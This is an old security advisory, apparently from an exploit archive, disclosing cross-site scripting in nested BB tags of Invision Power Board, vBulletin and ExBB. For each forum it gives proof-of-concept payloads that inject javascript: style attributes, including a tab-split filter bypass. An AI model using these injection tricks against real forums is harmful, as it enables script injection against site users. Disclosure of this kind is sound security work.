bbtagXSS.txt

bbtagXSS.txt: Posted Jan 18, 2005; Authored by pigrelax; Cross site scripting vulnerabilities have been discovered in nester BB tags.; tags | advisory, vulnerability, xss; SHA-256 | d2edd3b75016dd553e18d0017adb0b56aa6543383f5e78d348e1beb9db00f5f7; Download | Favorite | View

bbtagXSS.txt

XSS was found in the nested BB tag in many forum:

Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]

vBulletin
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")

ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert()); 

Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

bbtagXSS.txt

bbtagXSS.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

bbtagXSS.txt

Share This

bbtagXSS.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems